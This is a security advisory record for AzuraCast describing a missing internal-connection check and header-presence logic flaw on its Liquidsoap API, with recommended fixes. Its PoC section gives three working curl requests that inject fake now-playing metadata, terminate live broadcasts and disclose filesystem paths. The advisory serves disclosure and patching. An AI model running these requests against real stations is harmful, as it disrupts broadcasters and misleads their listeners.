{"id":"GHSA-4fm3-ggg2-c6qx","aliases":[],"url":"https://o3.security/vulnerability/GHSA-4fm3-ggg2-c6qx","summary":"AzuraCast's Missing RequireInternalConnection on Liquidsoap API Allows Low-Privilege Metadata Injection and Broadcast Disruption","details":"## Summary\n\nThe `/api/internal/{station_id}/liquidsoap/{action}` endpoint is accessible from the public web interface because it lacks the `RequireInternalConnection` middleware that protects other internal endpoints (`/sftp-auth`, `/sftp-event`). Combined with a logic flaw where the `$asAutoDj` flag is set based on the *presence* of the `X-Liquidsoap-Api-Key` header rather than its *validated value*, any user with the basic `View` station permission can invoke privileged Liquidsoap commands — injecting arbitrary now-playing metadata visible to all listeners, disrupting live broadcast tracking, and disclosing absolute filesystem paths.\n\n## Details\n\n**Issue 1: Missing RequireInternalConnection middleware**\n\nIn `backend/config/routes/api_internal.php`, the liquidsoap route group (lines 17-21) lacks the `RequireInternalConnection` middleware:\n\n```php\n// Lines 17-21 — NO RequireInternalConnection\n$group->map(\n    ['GET', 'POST'],\n    '/liquidsoap/{action}',\n    Controller\\Api\\Internal\\LiquidsoapAction::class\n)->setName('api:internal:liquidsoap');\n```\n\nCompare with sftp endpoints that correctly apply it:\n\n```php\n// Lines 32-34 — HAS RequireInternalConnection\n$group->post('/sftp-auth', Controller\\Api\\Internal\\SftpAuthAction::class)\n    ->setName('api:internal:sftp-auth')\n    ->add(Middleware\\RequireInternalConnection::class);\n```\n\nThe nginx config (`util/docker/web/nginx/azuracast.conf.tmpl`) only sets the `IS_INTERNAL` FastCGI parameter on the internal port 6010 listener (line 44), not on the public-facing server block (ports 80/443). Without the middleware, the endpoint is fully accessible from the public internet.\n\n**Issue 2: `$asAutoDj` derived from header presence, not validated value**\n\nIn `backend/src/Controller/Api/Internal/LiquidsoapAction.php`:\n\n```php\n// Line 34 — checks header PRESENCE, not value\n$asAutoDj = $request->hasHeader('X-Liquidsoap-Api-Key');\n\n// Lines 38-44 — key value only checked when ACL FAILS\n$acl = $request->getAcl();\nif (!$acl->isAllowed(StationPermissions::View, $station->id)) {\n    $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');\n    if (!$station->validateAdapterApiKey($authKey)) {\n        throw new RuntimeException('Invalid API key.');\n    }\n}\n```\n\nWhen a user authenticates via session/API key and has `StationPermissions::View`, the ACL check passes and the adapter API key is never validated. But `$asAutoDj` is already `true` from line 34 because the header is present (with any arbitrary value).\n\n**Affected commands:**\n\n- `FeedbackCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/FeedbackCommand.php:36`): Guard `if (!$asAutoDj) return false;` bypassed — creates SongHistory records and forces NowPlaying cache updates\n- `DjOffCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/DjOffCommand.php:24`): Guard bypassed — calls `$this->streamerRepo->onDisconnect($station)` which ends all active broadcasts and sets `$station->is_streamer_live = false`\n- `DjOnCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/DjOnCommand.php:31`): Guard bypassed — calls `$this->streamerRepo->onConnect($station, $user)` with attacker-controlled username\n- `CopyCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/CopyCommand.php:18`): No `$asAutoDj` guard at all — returns absolute filesystem paths via `$mediaFs->getLocalPath($uri)`\n\n## PoC\n\n**Prerequisites:** A user account with `StationPermissions::View` on station ID 1 (the lowest station-level permission). Obtain a session cookie or API key for this user.\n\n**1. Inject arbitrary now-playing metadata (FeedbackCommand):**\n\n```bash\ncurl -X POST 'https://target/api/internal/1/liquidsoap/feedback' \\\n  -H 'X-API-Key: <view-user-api-key>' \\\n  -H 'X-Liquidsoap-Api-Key: anything' \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"artist\": \"INJECTED\", \"title\": \"Fake Song Title\"}'\n```\n\nExpected: Should reject — user does not have the adapter API key.\nActual: Returns `true`. The injected artist/title appears in `/api/nowplaying/1` for all listeners.\n\n**2. Disrupt live broadcast (DjOffCommand):**\n\n```bash\ncurl -X POST 'https://target/api/internal/1/liquidsoap/djoff' \\\n  -H 'X-API-Key: <view-user-api-key>' \\\n  -H 'X-Liquidsoap-Api-Key: anything'\n```\n\nExpected: Should reject.\nActual: Returns `true`. All active broadcast records for the station are terminated (`timestampEnd` set), `is_streamer_live` set to `false`, and `current_streamer` cleared.\n\n**3. Disclose filesystem paths (CopyCommand):**\n\n```bash\ncurl -X POST 'https://target/api/internal/1/liquidsoap/cp' \\\n  -H 'X-API-Key: <view-user-api-key>' \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"uri\": \"test.mp3\"}'\n```\n\nExpected: Should reject — this is an internal-only endpoint.\nActual: Returns `{\"uri\":\"/var/azuracast/stations/1/media/test.mp3\",\"isTemp\":false}` — disclosing the absolute filesystem path of the station's media storage.\n\n## Impact\n\nAny user with the basic `StationPermissions::View` permission (the lowest station-level role, commonly assigned to DJs and collaborators) can:\n\n1. **Inject arbitrary now-playing metadata** visible to all listeners via the public NowPlaying API and any connected players/widgets. This poisons the song history database and triggers cache updates that propagate the false data to all consumers.\n\n2. **Disrupt live broadcasts** by terminating all active broadcast records and marking the station as having no live streamer, even when a DJ is actively broadcasting. This affects broadcast recording and live-DJ tracking.\n\n3. **Fake DJ connections** with arbitrary usernames via the `djon` command, polluting streamer logs and potentially interfering with DJ scheduling.\n\n4. **Disclose absolute filesystem paths** of the station's media storage directory via the `cp` command (no `$asAutoDj` guard required), which aids further attacks against the server.\n\n## Recommended Fix\n\n**Fix 1: Add `RequireInternalConnection` middleware to the liquidsoap route group.**\n\nIn `backend/config/routes/api_internal.php`, add the middleware to the station group:\n\n```php\n$group->group(\n    '/{station_id}',\n    function (RouteCollectorProxy $group) {\n        $group->map(\n            ['GET', 'POST'],\n            '/liquidsoap/{action}',\n            Controller\\Api\\Internal\\LiquidsoapAction::class\n        )->setName('api:internal:liquidsoap')\n+           ->add(Middleware\\RequireInternalConnection::class);\n\n        // Icecast internal auth functions\n        $group->map(\n            ['GET', 'POST'],\n            '/listener-auth[/{api_auth}]',\n            Controller\\Api\\Internal\\ListenerAuthAction::class\n        )->setName('api:internal:listener-auth');\n    }\n)->add(Middleware\\GetStation::class);\n```\n\n**Fix 2: Validate the API key value before setting `$asAutoDj`.**\n\nIn `backend/src/Controller/Api/Internal/LiquidsoapAction.php`, move `$asAutoDj` assignment after key validation:\n\n```php\n- $asAutoDj = $request->hasHeader('X-Liquidsoap-Api-Key');\n+ $asAutoDj = false;\n\n  try {\n      $acl = $request->getAcl();\n      if (!$acl->isAllowed(StationPermissions::View, $station->id)) {\n          $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');\n          if (!$station->validateAdapterApiKey($authKey)) {\n              throw new RuntimeException('Invalid API key.');\n          }\n+         $asAutoDj = true;\n+     } else {\n+         // Even ACL-authenticated users must provide valid adapter key for AutoDJ operations\n+         $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');\n+         $asAutoDj = !empty($authKey) && $station->validateAdapterApiKey($authKey);\n      }\n```\n\nBoth fixes should be applied. Fix 1 is the primary defense (defense in depth — this endpoint should never be publicly accessible). Fix 2 corrects the logic flaw so that `$asAutoDj` is only `true` when the adapter API key is actually valid, regardless of how authentication was performed.","published":"2026-05-04T21:18:22Z","modified":"2026-05-05T16:15:31.432285Z","cvss":{"score":6.3,"severity":"MEDIUM","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},"epss":null,"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"Packagist","name":"azuracast/azuracast","fixedVersion":"0.23.6"}],"fix":{"url":"https://github.com/AzuraCast/AzuraCast/commit/13fa7a71435629147b351d3ee151b8de6acd5c8c","label":"AzuraCast/AzuraCast@13fa7a7"},"references":[{"type":"WEB","url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-4fm3-ggg2-c6qx"},{"type":"WEB","url":"https://github.com/AzuraCast/AzuraCast/commit/13fa7a71435629147b351d3ee151b8de6acd5c8c"},{"type":"PACKAGE","url":"https://github.com/AzuraCast/AzuraCast"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-05-05T16:15:31.432285Z"}}